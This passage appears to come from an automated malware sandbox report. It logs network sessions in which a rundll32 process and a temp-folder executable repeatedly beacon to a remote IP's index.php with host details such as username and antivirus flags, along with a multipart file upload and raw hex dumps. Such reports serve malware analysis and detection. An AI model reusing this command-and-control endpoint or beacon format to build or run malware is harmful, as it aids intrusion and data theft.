                                                                                                                                          Data Ascii: --152138533219.jpgContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-streamJFIFCC"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzw!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?P/.Rw\5\iGzu{S;/VeOPH<Q+rCOpV0&8"]|J\(I5gmXh(V)j}cxoZ|/{.+<I]n1'"P)y-X&$}*?=&vW>EUEvg_kByYY7;8<\[o]esE?)rvWDK'jnbMND>~4|7u{t.>e_*|o9j"-+*+)OfoV}d8KeCOC?TSWN.)kDX'ZuQkgw-o/nd5pp<olj1;1s<*X|89869e}Ie!V^~*4_no~>K-[R9t/w6_gcmA~r 9qXxJ^w<MNH~@C5|\>;$62>x}<uw5oa?_r3#~?/Oz_W<Cu3V2m yXZW_x[[B$)! zLml[aj3\snV&L3y{NijJ*@79>,?gzWMeYo#'u+$L\A @oO-OU*:N3Z1R_cH^8k,,4;DO|S_s}2`$16T9seb;M_PO''wK`U!cruS|&:n`t)P#DwZZi716ikp|&Tl5CFUeSo+lKJ%y4J+_|GYuYJVsTWU8w]|e*qV8%%uzNkEV~pW^:oN*nQv|XIG(EA{WqGWZLZl*Wtd1NBAWU.G>_9'NvZa2ZJ=xS15$2U=OKt]Bm'WCUayg(~WR)Ttvi[46t6`K}4rm6>cJQsZfV|<9C474$Z9XKzu*U{b8a1HvOah((RQZ];SBzu5e:dQEN5BL3'Z:lW)vQE@w_JJc)=irSN:)i%4}ER?ORQ@u%GXD?k:k$QFhzAS:c679Z*G(*dRTt(((@QE@q'vK(dMzoz6(;RIfh((-R?W$:~4*}Y;R'f1>>((v$GAZy4-JP'ZPvU"e<ayk=h8'li_1xO.t&sv%^dz|D<OHOr;Y.VD8ud|7~g=|C)$(38Ri)J9Ji?yD2!g'YB7^tz{ii2N]RYoLU|wtzyK$c\N+#[?pbd ,mp3g+zE,VUVMuM;4}4S~x['VaQ`v1ER1'+!_EdK& [;R%s:{"z7M<zY:H+9nm58?}W\^ip]{NbL\gyVqff|Q(X.pJS<B>;(U:L*QnVO]5?Q!a(Gz'WIXQI9Ez#B MJ5OJsK+{^'_[> x7:yke]hxj?>xXeZ'<|Mxn/L^%z4:3<>LYU;3/<Z/b>c^YIl2bK<ueAUtQT7+siqpWtY+SI&zz47~]vv^i~-:_&[K6B{?)*/4BK;x%_5YEq>6EHD4Z?Zz}]$-u`rT_RY51tO%p8-Sm\jsm]_su_U:*qp~ROp((q~n#s'//4V&6w*M3< +{Hz?T|Jo{}?L~xVP_@&lm*u1M5{6(vJJxzqSRNJISkmrz&Q_:L.h:v/-u7QgBLs??k}gt47+oRiPc$4m;c;_Wx7A>C%u534d`osV VIu,f_7VeevK+IgYfyAUsp_M]'N\uo8_?v[~'44Y&h#.~NrN?]/K:u0+KhkR4(VZ,Lh0[]G->O:>W?:3XeKIgp8KKgh_o~~'wh7q"\M-TZ2R9FX)mo(KT~;Eo,n]mL#V~%|%mOx,=:|jsy#s.[-SS%Q\E6wsEW4z>!nt{L$S#H$x ?i7m'Px;JKOkWcqa7q4Fq?iK/P3]iVb.2Y@#$P9FWIupo3=*r:rT7N1J.:+E-X~SwB.oXyq"_.y~e}P?b|+-kKGZu<C("mr18DW\S<{3oir**G/T.aTe^D*]!l>_M@]ThJZQEaEU$)(Q@QUvi@%GN:}}5:6V}0;ROOiN*Xrz$H(jb=eL3!6qQId6t}RP)#tb"R1]%JoK((MdMOSRQQ"M%Sq+DM9CI>%:>I@QAQEQEaA?[QE@Q@_X}GiNUISHSdHzNt0;$UjM<zRy#E5Wu%*}XKOOs"?/zU]WtN.f}Ph?|2O2Gq\{y_wxs64-c4STc(W!@lO5xC.ej,pZJ;*'+%#osW|:yH5W^QMTURVm+=LjrQRHFjqwI?ox&d!X^-8>^x^/goTu=Y?n_r?#_?\2EQVY%ov='eU,-j+$7M&<J&qLX_I_ghCig&{4}o/w2vy*Ky@5H;6x^z2zWs3wSahz\t[BGRC|c_2Jcl<YW_'3w(`*?yB.N>1RV0RZsI+]G:3#cW%x""'%'iO2tvGJ+pV1R6(j>4|@>$tzMn]L'8I;A><]VJPnTMSF'5%dm_Jru?*Gg[~CWG'jH!k)DjVL?Zz?SR.^6uQ_&|?0\hZk,t-$UH]|VTk^&<]u-6u,y x7"#r?cq5/gtA?@_9<+mZ/k[@-b'NsM],2'=x?5YS7+@SAms&[u9UKe:7_x7[[Kn;H%b03?+>=<8;x{;I>i6m;$'/2PJM4X6R4jx"OgQNi@_/I3O_]>>TFwm~Y:2t{!GoI<#~L?_<aCOPRikiX=\99S*;s{IWd0sG5mi+]Scoqqgq8x09 ~nx[?l;1"D/Yx.}o_?s_W_c|Q0<x=c%iE;'n>/ArE2VQwW|9s|=tJuzv<;ss6U4D!UU.U$*tV"zU$GB)qO+2///k!#>2xHxJ#j_X'c5%qfe{'/t55]+[fa]{0GO&?g[|IErG]#EAMlFAy\33?SdB|:~|6K}]:OqZ"B"k$nQcWW\=iUtZt?N.L-*,ndj-)&>UN,avAv1iM6 HmWa_[C^_4M~_X6R.t6[H&f^%pv$i,`}28b"\+>NK_srC!:\t#c&n1_W9S/7A#1oL*x5ARy~73ul4KLzmNfcN~)_#Ry($(QN_w>#KXhx/e%7}HDAZ6j"&9QE;co3.$-PD'Zu6>:>*DNdM*H?ZD)=*V]K8O|P?yA};!|/)\heIR5~S>qQ4DO&NvXH;vYs2:MRl(2 OeI6'j'j$=HiEH)vDi67>P#'j0E<C.y.9'O(%GRhQEQEfEPQ`(S_:czRQ@)(t}S@Q@S-QEaEPEPEP$F'?ZOoCNu^4<sW[,r["jn_i+sm?Iu3{Fo>qo~|Zy#z/>/rB) e8j,k.t/pY=gWa0xqJXsP!!mMi$OQO|[/~;RxBd hc ,UX)<Vd}Z}>[Y'%YrTdyB#]tw}s1*o}lC/Wuwe;VAniduOD;||w_+)W[[I-i\[B\ocUK~Ow0uM";g\GHBMpk_b+M_WxlL{gZiwjp?5|Y<#;76<OaiW\$*@O5wd8Bis^m,k2_^~1,ibVs.g$X&|Z,o!q_s%vs$P$ljUF0j*\4z6mYn;c^IW4U{%:o&pxi^=oBq( |JVmm~^qsk6OM<LwNC|dhrZxzmT/si}{y,YEmt$yOE)e8jY_EF3Ii~YJo\Z$ub!J0.TOJIul+LO^~ZuihC|qVXAuY}-KMH%n!h">WS~oxN4<v,K"/lZY4V-eMpy+}tQJM;j1;+&MYkt3(a-?Gxti+hWR}:'Z<ER>U>xCZ-q'](jYG60,HfM5MsI+mnTe3X\r(6+{k>h2ozxcW> *mo#]om`m5_|1X|sWw^H$s5UKQ!Uj4Ta&6VZoo'q*UDVu?{U<DhNwyAbH"_f%2|62'cQ|1dz^xzsk:O-k!PX4+Hc#"S['4\<!])mD^[G%dX. JFcwwzN&UdZW,cv/MWW[4x?FCc:~u |[K0?<m!xjo-R{!YmvYgk~$7.$YqusoalQTdPm5KhRZ3qR;4>o<K=_)7)1qMu+Ntp@rr<s"e]>|9au'vB+~|KcetG9[R_7M-%k>4ceZt(Cj1,YO(}wqZkgW5HVI^fu}]fy#zWkOx{V1=]j0^-\[LK+#%Q&VO>xW_#d]2IId'cu/++vw\YJik3Ag,>xks{z^l,./$O16`Gls?/l5>2?+/cxK-.}vCvMcKbERUcJR~k}~WmVQ6w9c/(5jI0Gq'UP\>?x?g?5_'gGsH<'KJ}^\Eo6riR`bQHFkuN6xS]c[\4hjUHJA >N6Q'JMJIk"Wm-zIv}"_3aoM?x%3'_Ww5[xtok4Iv-\K24i2$}8t9~,<;Y<Es3ko5YURdq6wVJ:jw}U|-no]_So)9K/~>>3^QT{%ImRHf9 cGW|9(T)-!H>dkZQ*n%EFNo_/:X~w;iE{H.nI)<_*+E+YUHrn1ktkZ?u+gS5]q.n]B9,YgPW,<&
                                                                                                                                          Apr 28, 2021 22:59:38.558820009 CEST5443OUTData Raw: 56 ff 00 77 14 95 00 2a 7d ea 7d 31 3a d3 eb 40 1e 9f 76 9f 1f 7a 8e 3e f4 ea b8 99 92 a7 5a 97 9d 95 5e 3e f5 35 6a 65 2d 87 47 de 9d 51 d3 93 ad 04 0e a2 91 fa 7e 34 b4 e3 f1 00 53 bf e5 9d 1f f2 ce 97 e7 f6 ad cc c4 fd e5 07 7f ff 00 aa 9d 45
                                                                                                                                          Data Ascii: Vw*}}1:@vz>Z^>5je-GQ~4SE7YihL=Z(cD2G.|e"0?Z%@rbORg8\~)*JF0s~NJP#E?ftmG*/+R<M*mczT<z?ZM1(+I
                                                                                                                                          Apr 28, 2021 22:59:38.559484005 CEST5449OUTData Raw: bf e5 4d aa 33 1d 27 6a 75 36 3e f4 49 da 80 1b 49 dd 69 68 dd b7 9c d4 cb 73 40 a9 2a 20 db b9 a7 c7 de 88 93 22 54 fb b4 b5 14 5f eb 2a 5a a3 39 08 ff 00 76 99 4f 7f bb 4c a0 71 d8 8e 9c 9d 68 e7 7d 23 fd ea 06 0c db a9 63 ef 44 9d a8 93 b5 00
                                                                                                                                          Data Ascii: M3'ju6>IIihs@* "T_*Z9vOLqh}#cD"}}GRPM:'jmMz>>%zi}uOA.:QA$s)|jQc6#$S]h4y"n1KTGg_T.r/Nb:)
                                                                                                                                          Apr 28, 2021 22:59:38.559973001 CEST5454OUTData Raw: f9 f0 8f f6 66 fd bf f5 ff 00 84 ff 00 04 fc 24 ba 2e 81 a6 ad aa d9 d9 7d ae 5b 86 45 93 4c b0 b8 60 65 99 de 47 fd e4 f2 91 b9 8e 37 60 70 05 7e d2 7e c3 ff 00 b6 2f fc 2d 4f da 8b c3 1e 02 ff 00 87 c9 ff 00 c2 d6 fb 7f db 7f e2 81 ff 00 86 78
                                                                                                                                          Data Ascii: f$.}[EL`eG7`p~~/-Oxe<N:R4,*(.kTM}}nz(5yc((~$}:'ju=:~46zD8AQU*_
                                                                                                                                          Apr 28, 2021 22:59:38.560167074 CEST5457OUTData Raw: a5 4f b0 d4 7e 5f bd 5f 2b 27 98 6d 2e d3 8c d3 d5 01 3c 53 bc bf 7a 5c a4 f3 11 6c 3e 94 04 39 fb b5 2f 97 ef 47 97 ef 4f 94 39 88 dd 09 fe 1a 36 1a 95 a1 4c ff 00 85 27 d9 bd a9 72 87 31 1f 97 ef 47 97 ef 53 79 1e f4 92 47 e5 d3 e5 61 cc 8a ec
                                                                                                                                          Data Ascii: O~__+'m.<Sz\l>9/GO96L'r1GSyGa>SQG++2rNj9GCT_&b!eI<1GSI79zO%jzn9C%E^eL^|hZMP<aS3czT{3XJmN2H
                                                                                                                                          Apr 28, 2021 22:59:38.560291052 CEST5459OUTData Raw: 71 ff 00 09 d7 8d cf fd c9 13 7f f1 75 fc de 78 6b e1 1f c5 8f 18 fc 4d 1f 05 3c 1f f0 ab c4 9a af 8c cd fc f6 23 c2 3a 66 85 71 3e a8 6e a1 df e7 41 f6 44 43 37 98 9b 1f 72 6d dc bb 1b 20 60 d7 5f a0 7e c4 3f b6 af 8c 3c 6b af 7c 33 f0 97 ec 75
                                                                                                                                          Data Ascii: quxkM<#:fq>nADC7rm `_~?<k|3u[T'~?:?j 2[F@/`1UZ-jCcq:n!}uz7r~o:3>6x?823_:[oAIzm"I4bCE
                                                                                                                                          Apr 28, 2021 22:59:38.560852051 CEST5462OUTData Raw: cb d6 a6 65 db de 92 a3 94 d3 98 87 ca 7f 4a 6b c7 dc d4 df bc a6 49 bf 15 9f 29 5c c4 5b 0d 35 e3 f5 a9 28 a9 2f 99 11 79 5e c6 a5 55 fd de 4d 15 22 8f dd e6 a7 94 52 91 03 47 f8 d4 7e 57 b0 ab 2b 1f ad 12 0c 35 69 ca 38 c8 a3 24 7f 35 15 34 d1
                                                                                                                                          Data Ascii: eJkI)\[5(/y^UM"RG~W+5i8$546zM"iyNR0'j^THSh~+GKDLU1sl_J6/KQaex{]vc?izVzuWj;f}jz~3#mn;{Ql-*e
                                                                                                                                          Apr 28, 2021 22:59:38.562028885 CEST5465OUTData Raw: dd b2 5c c1 20 0f 04 92 5b 4b 14 c1 1c 06 d9 2a 31 00 32 93 e3 5f f0 9c 7c 4d 1f 0b 9f e0 62 7c 56 f1 30 f0 34 9a bf f6 ac 9e 0b 1a ed c7 f6 53 5f ec 09 f6 b3 69 bf c9 33 6d 01 7c cd 9b b0 31 9c 56 35 96 95 65 a7 92 6d a2 c1 3d ea e3 94 e2 e7 98
                                                                                                                                          Data Ascii: \ [K*12_|Mb|V04S_i3m|1V5em=9$je5\zI]yMJJ%ed(~wS#x2~'kk)uI4J$k}sx]MV70Q]~N[<|u
                                                                                                                                          Apr 28, 2021 22:59:38.654827118 CEST5477OUTData Raw: cf e6 5e 9c f1 56 25 d3 a5 85 80 09 9c 74 15 ea 65 b9 46 2b 01 5a ac e7 3b a9 b6 d2 e8 9b 94 a4 ff 00 f4 a5 1d 2d a4 57 5b b7 e5 e3 b3 4c 2e 36 95 38 42 3a c5 5a ef 76 94 63 15 eb f0 f3 36 fe d4 a5 b2 b2 55 e9 b1 f7 a9 9a de 6e a5 29 16 37 cf dc
                                                                                                                                          Data Ascii: ^V%teF+Z;-W[L.68B:Zvc6Un)7[yTZ?Z>\rJTMt}^S.a?H*Ty;rAOXjjXB*~etrs]P7JY#o:`3"U&9/)<9/SRy^h#
                                                                                                                                          Apr 28, 2021 22:59:38.654875994 CEST5483OUTData Raw: 27 6a 0a e6 64 6f 01 ef 55 de 10 4e 3a 55 ea 64 8a 0b 73 51 ca 5c 64 72 db b6 f3 9a fd 31 ff 00 83 51 ae c4 5f f0 53 ad 4d ca b1 1f f0 aa 35 8f 95 17 24 e2 e2 c8 e0 0e e7 8a fc ce af 69 fd 83 ff 00 6f 0f 8d bf f0 4e cf 8d 77 1f 1f 3e 00 d9 e8 53
                                                                                                                                          Data Ascii: 'jdoUN:UdsQ\dr1Q_SM5$ioNw>Sk390D"|P$a#:ppUaC3qOaM|)|_u+"mTyhXwr$)@%j]6+/oqo!G# 9o(?Ko
                                                                                                                                          Apr 28, 2021 22:59:38.655314922 CEST5488OUTData Raw: 79 ba 8e 9d f6 8b 07 1a 65 e4 af 14 72 cd 73 69 e4 cb 34 d1 ac d2 3b ca a1 c7 89 53 28 cd a3 89 93 8b bc 1b 8e 97 b2 69 41 46 4a da d9 39 59 a5 aa 4a 9c 55 9f 3c cf 55 e6 99 5d 6a 7a ab 4a da 3b 5d a7 dd da d7 7b dd de 2d b9 c9 de f1 82 5e 9b f1
                                                                                                                                          Data Ascii: yersi4;S(iAFJ9YJU<U]jzJ;]{-^?O.x^$Q|E<>.$APq*nBv'Bo<#mS6>tGeso,A\mim=[="o05[O[


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          171192.168.2.449844176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:38.610358000 CEST5466OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          172176.111.174.11480192.168.2.449844C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:38.710623980 CEST5521INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:38 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          173192.168.2.449846176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:38.938213110 CEST5684OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          174176.111.174.11480192.168.2.449843C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:38.946222067 CEST5695INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:38 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          175176.111.174.11480192.168.2.449846C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:39.054698944 CEST5697INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:39 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          176192.168.2.449848176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:39.269417048 CEST5701OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          177176.111.174.11480192.168.2.449848C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:39.374224901 CEST5708INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:39 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          178192.168.2.449850176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:39.591568947 CEST5767OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          179176.111.174.11480192.168.2.449850C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:39.693455935 CEST5884INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:39 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          18192.168.2.449757176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:12.109806061 CEST4530OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          180192.168.2.449851176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:39.906858921 CEST5884OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          181176.111.174.11480192.168.2.449851C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:40.005188942 CEST5885INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:39 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          182192.168.2.449853176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:40.225919962 CEST5893OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          183176.111.174.11480192.168.2.449853C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:40.322767019 CEST5893INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:40 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          184192.168.2.449855176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:40.533087969 CEST6019OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          185176.111.174.11480192.168.2.449855C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:40.630696058 CEST6086INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:40 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          186192.168.2.449856176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
